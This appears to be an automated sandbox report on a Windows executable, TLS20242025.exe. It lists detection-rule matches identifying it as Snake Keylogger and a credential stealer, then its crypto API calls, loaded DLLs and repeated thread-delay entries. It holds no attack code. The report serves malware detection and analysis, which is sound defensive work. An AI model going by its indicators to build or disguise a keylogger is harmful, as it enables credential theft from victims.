Source: 0.2.TLS20242025.exe.3a4fe10.2.unpack, type: UNPACKEDPE |
Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking |
Source: 2.2.TLS20242025.exe.400000.0.unpack, type: UNPACKEDPE |
Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking |
Source: 0.2.TLS20242025.exe.3a92840.3.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: 0.2.TLS20242025.exe.3a92840.3.unpack, type: UNPACKEDPE |
Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/ |
Source: 0.2.TLS20242025.exe.3a92840.3.unpack, type: UNPACKEDPE |
Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking |
Source: 0.2.TLS20242025.exe.3a92840.3.raw.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: 0.2.TLS20242025.exe.3a92840.3.raw.unpack, type: UNPACKEDPE |
Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/ |
Source: 0.2.TLS20242025.exe.3a92840.3.raw.unpack, type: UNPACKEDPE |
Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking |
Source: 0.2.TLS20242025.exe.3a4fe10.2.raw.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: 0.2.TLS20242025.exe.3a4fe10.2.raw.unpack, type: UNPACKEDPE |
Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/ |
Source: 0.2.TLS20242025.exe.3a4fe10.2.raw.unpack, type: UNPACKEDPE |
Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking |
Source: 0.2.TLS20242025.exe.3959d70.4.raw.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: 0.2.TLS20242025.exe.3959d70.4.raw.unpack, type: UNPACKEDPE |
Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking |
Source: 00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: Process Memory Space: TLS20242025.exe PID: 5748, type: MEMORYSTR |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: Process Memory Space: TLS20242025.exe PID: 5576, type: MEMORYSTR |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: 0.2.TLS20242025.exe.3959d70.4.raw.unpack, DarkListView.cs |
Cryptographic APIs: 'TransformFinalBlock' |
Source: 0.2.TLS20242025.exe.3a4fe10.2.raw.unpack, -.cs |
Cryptographic APIs: 'TransformFinalBlock' |
Source: 0.2.TLS20242025.exe.3a4fe10.2.raw.unpack, -.cs |
Cryptographic APIs: 'TransformFinalBlock' |
Source: 0.2.TLS20242025.exe.3a4fe10.2.raw.unpack, -.cs |
Cryptographic APIs: 'TransformFinalBlock' |
Source: 0.2.TLS20242025.exe.3a92840.3.raw.unpack, -.cs |
Cryptographic APIs: 'TransformFinalBlock' |
Source: 0.2.TLS20242025.exe.3a92840.3.raw.unpack, -.cs |
Cryptographic APIs: 'TransformFinalBlock' |
Source: 0.2.TLS20242025.exe.3a92840.3.raw.unpack, -.cs |
Cryptographic APIs: 'TransformFinalBlock' |
Source: 0.2.TLS20242025.exe.50e0000.5.raw.unpack, DarkListView.cs |
Cryptographic APIs: 'TransformFinalBlock' |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: mscoree.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: apphelp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: vcruntime140_clr0400.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: ucrtbase_clr0400.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: ucrtbase_clr0400.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: uxtheme.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: amsi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: userenv.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: msasn1.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: gpapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: windows.storage.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: cryptsp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: rsaenh.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: cryptbase.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: dwrite.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: textshaping.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: textinputframework.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: coreuicomponents.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: coremessaging.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: ntmarta.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: mscoree.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: vcruntime140_clr0400.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: ucrtbase_clr0400.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: ucrtbase_clr0400.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: uxtheme.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: windows.storage.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: cryptsp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: rsaenh.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: cryptbase.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: rasapi32.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: rasman.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: rtutils.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: mswsock.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: winhttp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: ondemandconnroutehelper.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: iphlpapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: dhcpcsvc6.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: dhcpcsvc.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: dnsapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: winnsi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: rasadhlp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: fwpuclnt.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: secur32.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: schannel.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: mskeyprotect.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: ntasn1.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: ncrypt.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: ncryptsslp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: msasn1.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: gpapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Section loaded: dpapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 922337203685477 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 600000 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 599875 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 599765 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 599656 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 599546 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 599437 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 599327 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 599218 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 599109 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 599000 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 598890 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 598781 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 598671 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 598562 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 598453 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 598343 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 598234 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 598125 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 598015 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 597906 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 597796 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 597687 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 597578 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 597468 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 597359 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 597250 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 597140 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 597031 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 596920 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 596803 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 596672 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 596547 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 596437 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 596328 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 596218 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 596109 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 596000 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 595890 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 595781 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 595671 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 595562 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 595453 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 595343 |
Jump to behavior |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Thread delayed: delay time: 595234 |
Jump to behavior |
